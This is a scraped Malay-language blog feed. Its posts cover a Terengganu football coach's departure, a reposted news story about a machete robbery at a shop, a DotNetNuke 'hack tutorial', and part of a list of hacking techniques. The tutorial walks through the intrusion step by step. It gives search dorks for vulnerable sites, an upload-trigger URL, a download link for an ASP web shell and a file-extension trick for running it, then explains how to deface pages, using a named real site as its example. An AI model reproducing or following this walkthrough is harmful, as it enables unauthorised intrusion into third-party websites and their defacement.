The Kelantan-born coach caught almost everybody off-guard as he was said to have agreed to a new improved two-year contract almost a month ago.</div><div style="background-color: #f4f4f4; font-family: Arial, Verdana, Helvetica, sans-serif; font-size: 12px; text-align: left;"><br />
But Irfan, when met yesterday at the Terengganu FA office, said he had yet to sign a new deal as he needed time to consider his future.</div><div style="background-color: #f4f4f4; font-family: Arial, Verdana, Helvetica, sans-serif; font-size: 12px; text-align: left;">"I have had a great time in Kuala Terengganu, winning one trophy and coming close to getting our hands on two others but there are other things to consider too.<br />
<br />
"I have decided that I have already done what I was supposed to do here and it is time to look for new challenges and I wish everyone here well," he said.</div><div style="background-color: #f4f4f4; font-family: Arial, Verdana, Helvetica, sans-serif; font-size: 12px; text-align: left;"><br />
Irfan did not mention anything about his immediate future plan but soon after, Terengganu FA president Datuk Che Mat Jusoh revealed the coach's next destination during a press conference.<br />
<br />
Che Mat said it was a shock to hear from Irfan that he had accepted an offer from Selangor and that his decision was final.<br />
<br />
"We were caught by surprise as we thought he would still be with us next year after taking Terengganu to such heights this season.</div><div style="background-color: #f4f4f4; font-family: Arial, Verdana, Helvetica, sans-serif; font-size: 12px; text-align: left;"><br />
"We had agreed to everything he had wanted in the new contract and the thought of him leaving us had never crossed our mind until today," he said.<br />
<br />
Che Mat, who is also team manager, said Irfan's unexpected departure left Terengganu in a lurch.<br />
<br />
"We managed to get in touch with Pos Malaysia coach Mat Zan Mat Aris and at the moment, it looks like we may have found us a new coach.<br />
<br />
"Mat Zan was Terengganu's coach when we won the Malaysia Cup in 2001 and he does seem interested in joining us again as he has agreed to come down to discuss terms and conditions with us sometime this week," he said.</div><div style="background-color: #f4f4f4; font-family: Arial, Verdana, Helvetica, sans-serif; font-size: 12px; text-align: left;"><br />
</div><div style="background-color: #f4f4f4; font-family: Arial, Verdana, Helvetica, sans-serif; font-size: 12px; text-align: left;"><br />
</div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjU7B3Z1JrcuYsdjnNFPFLxOJO8F-GT7ayaZSmJhnsF29i7f-MEi2CqLwOp6cLoUEIrCTEVp8HDoPzlMgebrmWdjgfnwJjjKpjbsKv-7e6hy-vTShMOSa5qydPloJ3u9cyLcS4LsqDoSsTx/s1600/single.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="215" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjU7B3Z1JrcuYsdjnNFPFLxOJO8F-GT7ayaZSmJhnsF29i7f-MEi2CqLwOp6cLoUEIrCTEVp8HDoPzlMgebrmWdjgfnwJjjKpjbsKv-7e6hy-vTShMOSa5qydPloJ3u9cyLcS4LsqDoSsTx/s320/single.jpg" width="320" /></a></div><div style="background-color: #f4f4f4; font-family: Arial, Verdana, Helvetica, sans-serif; font-size: 12px; text-align: center;">In memory :D</div><span style="background-color: #f4f4f4; font-family: Arial, Verdana, Helvetica, sans-serif; font-size: 12px; text-align: left;"><br />
sumber asli: <a href="http://www.nst.com.my/nst/articles/uvhizuv/Article/">NST</a><br />
</span>Adios TDhttp://www.blogger.com/profile/00071510321782940313noreply@blogger.com0tag:blogger.com,1999:blog-5159176994329752150.post-3082553659295612922011-11-01T11:43:00.000+08:002011-11-01T11:43:57.207+08:00"Saya tak tahan"<div class="separator" style="clear: both; text-align: center;"><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;">salam...erk sorry entry agak 18xx sikit...hehe</span></div><div class="separator" style="clear: both; text-align: center;"><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;">ok apa sebenarnye yg adios nk smpaikn ialah....<br />
take a look readers!</span></div><div class="separator" style="clear: both; text-align: center;"><br />
</div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEicZCwmz3qs1kGgHCkrQT6GOtbN7Z4djWsJT61XX1aA3Ucxdw9noh1-TqrFj4AOaIpm-OJLSFENrFkkRZ2uq13FCSKAjBZZwTiX2WSWEgQiZEpRzzvLFXx-N5H0eRugfO-fbYStc22G7Kea/s1600/pix_middle.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="261" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEicZCwmz3qs1kGgHCkrQT6GOtbN7Z4djWsJT61XX1aA3Ucxdw9noh1-TqrFj4AOaIpm-OJLSFENrFkkRZ2uq13FCSKAjBZZwTiX2WSWEgQiZEpRzzvLFXx-N5H0eRugfO-fbYStc22G7Kea/s320/pix_middle.jpg" width="320" /></a></div> <span class="Apple-style-span" style="font-family: Arial, Verdana, Helvetica, sans-serif;">KUALA LUMPUR: Bagaikan telur di hujung tanduk. Itu perumpamaan bagi menggambarkan nasib tiga beranak yang ditetak bertubi-tubi dua penyamun bersenjatakan parang dalam kejadian di sebuah kedai runcit di Bandar Mahkota Cheras, di sini, Rabu lalu.</span><br />
<div style="font-family: Arial, Verdana, Helvetica, sans-serif;">Akibat pergelutan itu, pemilik kedai berusia lewat 40-an menerima 10 jahitan di kepala, isterinya yang berusia awal 40-an pula lapan jahitan di kedua-dua tangan manakala anak lelaki berusia 19 tahun, enam jahitan di kepala.</div><div style="font-family: Arial, Verdana, Helvetica, sans-serif;"><br />
Kejadian bermula jam 1 tengah hari, apabila sekumpulan empat lelaki menaiki dua motosikal berhenti di hadapan premis berkenaan.</div><div style="font-family: Arial, Verdana, Helvetica, sans-serif;"></div><div style="font-family: Arial, Verdana, Helvetica, sans-serif;">Mangsa yang enggan dikenali berkata, dua daripada lelaki itu yang memakai topi keledar masuk ke kedainya dan berpura-pura untuk membeli barang manakala dua lagi rakan mereka menunggu di luar.</div><div style="font-family: Arial, Verdana, Helvetica, sans-serif;"><br />
“Kedua-dua mereka tiba-tiba mengeluarkan sebilah parang yang disembunyikan di pinggang mereka dan mengacukan senjata berkenaan ke arah saya.</div><div style="font-family: Arial, Verdana, Helvetica, sans-serif;"><br />
“Tanpa berfikir, saya mengeluarkan kayu yang disembunyikan di bawah kaunter wang sebelum memukul seorang daripada mereka,” katanya ketika ditemui, di sini, semalam.</div><br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgo-JWvr7_796fsZW2mOV5HZiEz9mwLhT_KaUakwUrN1EvAEKa-vwmSB5V3mab_cvB8yMaRfCGF-KcEBC7nsUqvkUq_R5K_hodTrHXHoKsRfKe75X1QVpAg_sH4VWVvH8zZdIRf0hVy5yQy/s1600/pix_topright.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgo-JWvr7_796fsZW2mOV5HZiEz9mwLhT_KaUakwUrN1EvAEKa-vwmSB5V3mab_cvB8yMaRfCGF-KcEBC7nsUqvkUq_R5K_hodTrHXHoKsRfKe75X1QVpAg_sH4VWVvH8zZdIRf0hVy5yQy/s1600/pix_topright.jpg" /></a></div><div class="separator" style="clear: both; text-align: center;"><br />
</div><div class="separator" style="clear: both; text-align: center;"></div><div style="font-family: Arial, Verdana, Helvetica, sans-serif; text-align: -webkit-auto;">Menurutnya, kedua-dua mereka yang berang dengan tindakannya itu menghayunkan parang ke arahnya dan isteri.</div><div style="font-family: Arial, Verdana, Helvetica, sans-serif; text-align: -webkit-auto;"><br />
“Anak lelaki saya yang yang berada berhampiran segera memberikan bantuan.</div><div style="font-family: Arial, Verdana, Helvetica, sans-serif; text-align: -webkit-auto;"></div>“Lelaki itu terus menetak kami tiga beranak bertubi-tubi dan ketika itu saya menepis tetakan berkenaan menggunakan tangan dan kayu.<br />
<br />
“Tanpa saya sedari, kepala dan tangan saya sudah berdarah sebelum jeritan kuat anak dan isteri menyebabkan dua lelaki itu panik dan melarikan diri,” katanya.<br />
<br />
Mangsa berkata, dia bersama isteri dan anaknya cuba mengejar kumpulan terbabit namun gagal.<br />
<br />
“Saya menerima 10 jahitan di kepala dan cedera ringan di tangan, isteri pula menerima lapan jahitan di kedua-dua tangan dan anak lelaki saya, enam jahitan di kepala,” katanya.<br />
<br />
Mengulas tindakannya yang bertindak berani dengan melawan dua penjenayah itu, mangsa memberitahu, dia sudah tidak tahan kerana kedai runcitnya itu sering dijadikan sasaran kumpulan penyamun sejak dua tahun lalu.<br />
<br />
“Sebab itu saya sediakan kayu dan melawan mereka (penjenayah),” katanya.<br />
<br />
Katanya, biarpun cedera, dia berpuas hati kerana kumpulan terbabit gagal menyamun kedainya.<br />
<br />
Tiga beranak itu bergegas ke hospital swasta berhampiran berkenaan, di sini, sebelum pihak pengurusan hospital terbabit membuat laporan polis mengenai insiden itu.<br />
<br />
Difahamkan, seorang pegawai penyiasat bergegas ke hospital berkenaan dan merakamkan percakapan tiga beranak terbabit.<br />
<br />
Pihak berkuasa kini meneliti rakaman kamera litar tertutup (CCTV) di premis berkenaan yang menunjukkan kekejaman kumpulan penyamun terbabit.<br />
<br />
<br />
<br />
<span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;">so korang boleh lah ambik iktibar dari ap yg adios post nie...</span><br />
<span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"><br />
</span><br />
<span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;">berita asal: <a href="http://www.hmetro.com.my/myMetro/articles/2011110100485020111101004850/Article">myMetro</a></span>Adios TDhttp://www.blogger.com/profile/00071510321782940313noreply@blogger.com0tag:blogger.com,1999:blog-5159176994329752150.post-62056697874970214212011-10-31T01:41:00.001+08:002011-10-31T01:46:13.566+08:00tutorial hack using DNN :D<span class="Apple-style-span" style="background-color: white; color: #333333; font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 11px; line-height: 14px;"></span><br />
<div style="line-height: 16px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi1-LIC-M-9cCVxlQJvoFL2no8MCnik8Frf76L1RLMFRbUERYxUIwMtY7tp4SbA76sB4Nc-QoOIdW2KmtJ82IBE7RtpM9K7-ng6LBjlwB4vjoslNsVSl77J9P_dBE7Yto8wxgIT8ZqWsZfD/s1600/DotNetNuke.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="87" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi1-LIC-M-9cCVxlQJvoFL2no8MCnik8Frf76L1RLMFRbUERYxUIwMtY7tp4SbA76sB4Nc-QoOIdW2KmtJ82IBE7RtpM9K7-ng6LBjlwB4vjoslNsVSl77J9P_dBE7Yto8wxgIT8ZqWsZfD/s320/DotNetNuke.gif" width="320" /></a></div><br />
</div><div style="line-height: 16px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><strong style="line-height: 16px;">Step 1 : download this shell > </strong><span class="Apple-style-span" style="line-height: normal;"><a href="http://www.mediafire.com/?1t0t40297d4b1kg">http://www.mediafire.com/?1t0t40297d4b1kg</a></span></div><div style="line-height: 16px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><br />
</div><div style="line-height: 16px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><br />
</div><div style="line-height: 16px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><strong style="line-height: 16px;"></strong></div><div style="line-height: 16px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><strong style="line-height: 16px;">Step 2: Now enter this dork (this is Dork for find DNN Valn sites)</strong></div><strong style="line-height: 16px;"></strong><br />
<div style="line-height: 16px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><strong style="line-height: 16px;">> :inurl:/tabid/36/language/en-US/Default.aspx</strong></div><div style="line-height: 16px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><strong style="line-height: 16px;">or</strong></div><strong style="line-height: 16px;">> inurl:/Fck/fcklinkgallery.aspx<div style="line-height: 16px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><br />
</div><div style="line-height: 16px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;">Step 3:</div>it will show you many sites, Copy any one of site.<div style="line-height: 16px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><br />
</div><div style="line-height: 16px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;">Step 4:</div><div style="line-height: 16px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;">For example take this site.</div>Example:<div style="line-height: 16px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><br />
</div><a href="http://www.itservicespro.net/" rel="nofollow" style="color: #3b5998; cursor: pointer; line-height: 16px; text-decoration: none;" target="_blank">http://www.itservicespro.net/</a><div style="line-height: 16px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><br />
</div><div style="line-height: 16px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;">Step 5: Now Paste after the site url</div><div style="line-height: 16px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;">this</div>> /Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx<div style="line-height: 16px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><br />
</div><div style="line-height: 16px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;">so Site is this :</div><a href="http://itservicespro.net/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx" rel="nofollow" style="color: #3b5998; cursor: pointer; line-height: 16px; text-decoration: none;" target="_blank">http://itservicespro.net/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx</a><div style="line-height: 16px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><br />
</div> klua macam gambar nie > <div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiehsAw0UHwZe2fPXovWuGGaLvfUA654B8Wq7SN1D57aeAO6VGTVM5Hl57HeRtN_clzdZjnVA9PwUiiPbiA3puRSbvz-iQFSxV2znEVOuc7HE2tm3UHc3nHMhBBhMtv76dJwG3-t3CG-Axp/s1600/111.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="200" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiehsAw0UHwZe2fPXovWuGGaLvfUA654B8Wq7SN1D57aeAO6VGTVM5Hl57HeRtN_clzdZjnVA9PwUiiPbiA3puRSbvz-iQFSxV2znEVOuc7HE2tm3UHc3nHMhBBhMtv76dJwG3-t3CG-Axp/s320/111.png" width="320" /></a></div><div style="line-height: 16px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><br />
</div>Now Click on File ( A File On Your Site )<div style="line-height: 16px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><br />
</div>Step 8: Now replace the URL in the address bar with a Simple Script<div style="line-height: 16px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><br />
</div><div style="line-height: 16px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;">> javascript:__doPostBack('ctlURL$cmdUpload','')</div><div style="line-height: 16px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><br />
</div>Step 9: You will Find the Upload Option<div style="line-height: 16px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><br />
</div>macam gambar ni > </strong><br />
<div><strong style="line-height: 16px;"><br />
</strong></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj5SJcsbz3ZusKdSofe3Q7i2DlaWL4FHnrA9YLBPNVD6ltoFD7LZvgW3G4LJFLRuMlSgC5nj2L9JdTrvn66mrPfPQ0RSZkj3__SgSX4MFC0XWZF2Jbe7mY9TSy9aKjvGTsY4wcxnbSUsxH_/s1600/1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="200" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj5SJcsbz3ZusKdSofe3Q7i2DlaWL4FHnrA9YLBPNVD6ltoFD7LZvgW3G4LJFLRuMlSgC5nj2L9JdTrvn66mrPfPQ0RSZkj3__SgSX4MFC0XWZF2Jbe7mY9TSy9aKjvGTsY4wcxnbSUsxH_/s320/1.png" width="320" /></a></div><div><strong style="line-height: 16px;"><br />
</strong></div><div><strong style="line-height: 16px;"><br />
</strong><br />
<div style="line-height: 16px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><strong style="line-height: 16px;">Step 10:</strong></div><strong style="line-height: 16px;">Select Root<div style="line-height: 16px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><br />
</div><div style="line-height: 16px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;">Step 11:</div>Upload your shell ASp Download it here > <a href="http://www.mediafire.com/?1t0t40297d4b1kg">http://www.mediafire.com/?1t0t40297d4b1kg</a><div style="line-height: 16px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><br />
</div>After upload<div style="line-height: 16px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><br />
</div>go for your shell <a href="http://www.facebook.com/groups/172028722884754/doc/174627875958172/www.yoursite.com/portals/0/yourshellname.asp;.jpg" style="color: #3b5998; cursor: pointer; line-height: 16px; text-decoration: none;">www.yoursite.com/portals/0/yourshellname.asp;.jpg</a><div style="line-height: 16px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><br />
</div>EXample : <a href="http://www.itservicespro.net/portals/0/umer.asp;.jpg" rel="nofollow" style="color: #3b5998; cursor: pointer; line-height: 16px; text-decoration: none;" target="_blank">http://www.itservicespro.net/portals/0/umer.asp;.jpg</a><div style="line-height: 16px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><br />
</div>so you upload shell and shell is front of you look like this (screenshot below)<div style="line-height: 16px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><br />
</div>Click on <Dir>... again and again till you will see admin<div style="line-height: 16px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><br />
</div>gambar ><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhMzD4J8oUbakYdRHW10C96rA7F_ejcVgEVrxV4QvT9BsfslU92rjO4LQEFv88hmMYSJDNtFI4gAXecMLdUSQa36Xr_Hq5lDBrBnOg8DywlAB1xJRow9mUjbUKNjSboWjPhoY75bd8LaFrm/s1600/11.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="200" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhMzD4J8oUbakYdRHW10C96rA7F_ejcVgEVrxV4QvT9BsfslU92rjO4LQEFv88hmMYSJDNtFI4gAXecMLdUSQa36Xr_Hq5lDBrBnOg8DywlAB1xJRow9mUjbUKNjSboWjPhoY75bd8LaFrm/s320/11.png" width="320" /></a></div><div style="line-height: 16px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><br />
</div>so when it will show you this page admin area page click on UPLOAD FILE TO C:\WEBSITES\WWW.ITSERVICESPRO.NET\WEBSITE\<div style="line-height: 16px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><br />
</div>and upload your deface index page so<div style="line-height: 16px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><br />
</div>this is your result <a href="http://www.facebook.com/groups/172028722884754/doc/174627875958172/www.site.com/urpagename.html" style="color: #3b5998; cursor: pointer; line-height: 16px; text-decoration: none;">www.site.com/urpagename.html</a><div style="line-height: 16px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><br />
</div>for example see this <a href="http://www.itservicespro.net/merul.html" rel="nofollow" style="color: #3b5998; cursor: pointer; line-height: 16px; text-decoration: none;" target="_blank">http://www.itservicespro.net/merul.html</a><div style="line-height: 16px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><br />
</div>gambar > <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjotN9ICV-DgI1MokTtg74EWz-2qbhXiPx_v5EJiMqTYJ2nd4ruiDB2MdQVNxAVo1dEkHMPaNPexhAxc7EKIlUePcfotLNFr4nKChHyI5NAq3BIDVFIAddWb4G1VZEGg2OoNeIZxZwEAdg/s1600/Dnn4.jpg" rel="nofollow" style="color: #3b5998; cursor: pointer; line-height: 16px; text-decoration: none;" target="_blank">https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjotN9ICV-DgI1MokTtg74EWz-2qbhXiPx_v5EJiMqTYJ2nd4ruiDB2MdQVNxAVo1dEkHMPaNPexhAxc7EKIlUePcfotLNFr4nKChHyI5NAq3BIDVFIAddWb4G1VZEGg2OoNeIZxZwEAdg/s1600/Dnn4.jpg</a><div style="line-height: 16px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><br />
</div>If you want to deface main page then click on Admin dir and search for index htm or html and click on Edit and copy your deface page code and replace there...:)</strong></div><div><strong style="line-height: 16px;"><br />
</strong></div><div><strong style="line-height: 16px;">credit:to Malaya Hacker crew :D</strong></div>Adios TDhttp://www.blogger.com/profile/00071510321782940313noreply@blogger.com0tag:blogger.com,1999:blog-5159176994329752150.post-48186957972479539602011-10-31T01:17:00.000+08:002011-10-31T01:17:51.902+08:00Info:teknik hacking<span class="Apple-style-span" style="background-color: white; color: #333333; font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; line-height: 14px;"></span><br />
<div style="line-height: 16px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><strong style="line-height: 16px;">salam..kat sini adios nk bgtaw kt kowg teknik2 hacking yg biase digunakan oleh ramai hacker :D</strong></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhHMVEYUqmWMB4550mfzHxGiuhpmZaQlhFU8PrJVdaI4ckd54apy5N874_JerfPKqMV0_obP-J-p7Qk7KxkZmg21oXxbmFveQqBfGziDmijTvfvmG4CbAHtJrzcOoLJvxJYeDI7BKc_adoP/s1600/images.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhHMVEYUqmWMB4550mfzHxGiuhpmZaQlhFU8PrJVdaI4ckd54apy5N874_JerfPKqMV0_obP-J-p7Qk7KxkZmg21oXxbmFveQqBfGziDmijTvfvmG4CbAHtJrzcOoLJvxJYeDI7BKc_adoP/s1600/images.jpg" /></a></div><div style="line-height: 16px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><br />
</div><div style="line-height: 16px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;">1. IP Spoofing</div><div style="line-height: 16px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><br />
</div><div style="line-height: 16px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;">IP Spoofing juga dikenal sebagai Source Address Spoofing, yaitu pemalsuan alamat IP attacker sehingga sasaran menganggap alamat IP attacker adalah alamat IP dari host di dalam network bukan dari luar network. Misalkan attacker mempunyai IP address type A 66.25.xx.xx ketika attacker melakukan serangan jenis ini maka Network yang diserang akan menganggap IP attacker adalah bagian dari Networknya misal 192.xx.xx.xx yaitu IP type C. IP Spoofing terjadi ketika seorang attacker ‘mengakali’ packet routing untuk mengubah arah dari data atau transmisi ke tujuan yang berbeda. Packet untuk routing biasanya di transmisikan secara transparan dan jelas sehingga membuat attacker dengan mudah untuk memodifikasi asal data ataupun tujuan dari data. Teknik ini bukan hanya dipakai oleh attacker tetapi juga dipakai oleh para security profesional untuk men tracing identitas dari para attacker.</div><div style="line-height: 16px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><br />
</div><div style="line-height: 16px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;">2. FTP Attack</div><div style="line-height: 16px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><br />
</div><div style="line-height: 16px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;">Salah satu serangan yang dilakukan terhadap File Transfer Protocol adalah serangan buffer overflow yang diakibatkan oleh malformed command. tujuan menyerang FTP server ini rata-rata adalah untuk mendapatkan command shell ataupun untuk melakukan Denial Of Service. Serangan Denial Of Service akhirnya dapat menyebabkan seorang user atau attacker untuk mengambil resource didalam network tanpa adanya autorisasi, sedangkan command shell dapat membuat seorang attacker mendapatkan akses ke sistem server dan file-file data yang akhirnya seorang attacker bisa membuat anonymous root-acces yang mempunyai hak penuh terhadap system bahkan network yang diserang. Tidak pernah atau jarang mengupdate versi server dan mempatchnya adalah kesalahan yang sering dilakukan oleh seorang admin dan inilah yang membuat server FTP menjadi rawan untuk dimasuki. Sebagai contoh adalah FTP server yang populer di keluarga UNIX yaitu WU-FTPD yang selalu di upgrade dua kali dalam sehari untuk memperbaiki kondisi yang mengizinkan terjadinya bufferoverflow Mengexploitasi FTP juga berguna untuk mengetahui password yang terdapat dalam sistem, FTP Bounce attack (menggunakan server ftp orang lain untuk melakukan serangan), dan mengetahui atau mensniff informasi yang berada dalam sistem.</div><div style="line-height: 16px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><br />
</div><div style="line-height: 16px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;">3. Unix Finger Exploits</div><div style="line-height: 16px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><br />
</div><div style="line-height: 16px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;">Pada masa awal internet, Unix OS finger utility digunakan secara efficient untuk men sharing informasi diantara pengguna. Karena permintaan informasi terhadap informasi finger ini tidak menyalahkan peraturan, kebanyakan system Administrator meninggalkan utility ini (finger) dengan keamanan yang sangat minim, bahkan tanpa kemanan sama sekali. Bagi seorang attacker utility ini sangat berharga untuk melakukan informasi tentang footprinting, termasuk nama login dan informasi contact. Utility ini juga menyediakan keterangan yang sangat baik tentang aktivitas user didalam sistem, berapa lama user berada dalam sistem dan seberapa jauh user merawat sistem. Informasi yang dihasilkan dari finger ini dapat meminimalisasi usaha cracker dalam menembus sebuah sistem. Keterangan pribadi tentang user yang dimunculkan oleh finger daemon ini sudah cukup bagi seorang atacker untuk melakukan social engineering dengan menggunakan social skillnya untuk memanfaatkan user agar ‘memberitahu’ password dan kode akses terhadap system.</div><div style="line-height: 16px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><br />
</div><div style="line-height: 16px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;">4. Flooding & Broadcasting</div><div style="line-height: 16px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><br />
</div><div style="line-height: 16px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;">Seorang attacker bisa menguarangi kecepatan network dan host-host yang berada di dalamnya secara significant dengan cara terus melakukan request/permintaan terhadap suatu informasi dari sever yang bisa menangani serangan classic Denial Of Service(Dos), mengirim request ke satu port secara berlebihan dinamakan flooding, kadang hal ini juga disebut spraying. Ketika permintaan flood ini dikirim ke semua station yang berada dalam network serangan ini dinamakn broadcasting. Tujuan dari kedua serangan ini adalah sama yaitu membuat network resource yang menyediakan informasi menjadi lemah dan akhirnya menyerah. Serangan dengan cara Flooding bergantung kepada dua faktor yaitu: ukuran dan/atau volume (size and/or volume). Seorang attacker dapat menyebabkan Denial Of Service dengan cara melempar file berkapasitas besar atau volume yang besar dari paket yang kecil kepada sebuah system. Dalam keadaan seperti itu network server akan menghadapi kemacetan: terlalu banyak informasi yang diminta dan tidak cukup power untuk mendorong data agar berjalan. Pada dasarnya paket yang besar membutuhkan kapasitas proses yang besar pula, tetapi secara tidak normal paket yang kecil dan sama dalam volume yang besar akan menghabiskan resource secara percuma, dan mengakibatkan kemacetan.</div><div style="line-height: 16px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><br />
</div><div style="line-height: 16px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;">5. Fragmented Packet Attacks</div><div style="line-height: 16px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><br />
</div><div style="line-height: 16px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;">Data-data internet yang di transmisikan melalui TCP/IP bisa dibagi lagi ke dalam paket-paket yang hanya mengandung paket pertama yang isinya berupa informasi bagian utama( kepala) dari TCP. Beberapa firewall akan mengizinkan untuk memroses bagian dari paket-paket yang tidak mengandung informasi alamat asal pada paket pertamanya, hal ini akan mengakibatkan beberapa type system menjadi crash. Contohnya, server NT akan menjadi crash jika paket-paket yang dipecah(fragmented packet) cukup untuk menulis ulang informasi paket pertama dari suatu protokol.</div><div style="line-height: 16px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><br />
